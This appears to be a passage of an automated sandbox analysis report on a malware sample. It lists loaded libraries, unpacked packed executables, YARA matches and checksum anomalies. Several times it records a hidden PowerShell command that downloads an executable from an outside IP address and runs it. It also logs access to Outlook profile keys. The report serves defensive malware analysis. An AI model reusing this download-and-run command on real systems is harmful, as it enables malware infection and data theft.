                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                                      Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                      Source: 5EfYBe3nch.exeStatic file information: File size 1858048 > 1048576
                                      Source: 5EfYBe3nch.exeStatic PE information: Raw size of dalsczsh is bigger than: 0x100000 < 0x19bc00
                                      Source: Binary string: mozglue.pdbP source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                      Source: Binary string: ntkrnlmp.pdbx, source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: nss3.pdb@ source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ntkrnlmp.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmp
                                      Source: Binary string: nss3.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                      Source: Binary string: mozglue.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp

                                      Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Unpacked PE file: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack :EW;.rsrc:W;.idata :W;zrmackkh:EW;rcriyoua:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;zrmackkh:EW;rcriyoua:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Unpacked PE file: 5.2.31FYMQUCQX14ZVCZU2HAYNV7V.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 6.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 7.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Unpacked PE file: 13.2.GIIIIJDHJE.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 14.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | Unpacked PE file: 16.2.iSHmPkn.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xuvnqsmj:EW;dkjxiybl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xuvnqsmj:EW;dkjxiybl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Unpacked PE file: 43.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Unpacked PE file: 44.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Unpacked PE file: 58.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | Unpacked PE file: 59.2.jyidkjkfhjawd.exe.c00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Unpacked PE file: 73.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1027024001\am.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe, type: DROPPED
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: eXbhgU9[1].exe.15.dr | Static PE information: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 10DCQZI.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0xd497
Source: iSHmPkn.exe.15.dr | Static PE information: real checksum: 0x1a3eec should be: 0x1a1b22
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: real checksum: 0x0 should be: 0x13ab91
Source: iSHmPkn[1].exe.15.dr | Static PE information: real checksum: 0x1a3eec should be: 0x1a1b22
Source: av3EZhq.exe.15.dr | Static PE information: real checksum: 0x147442 should be: 0x1ebf52
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: real checksum: 0x31d37e should be: 0x3239b2
Source: am[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x21d41
Source: av3EZhq[1].exe.15.dr | Static PE information: real checksum: 0x147442 should be: 0x1ebf52
Source: 5EfYBe3nch.exe | Static PE information: real checksum: 0x1d375a should be: 0x1cd634
Source: random[1].exe.2.dr | Static PE information: real checksum: 0x31d37e should be: 0x3239b2
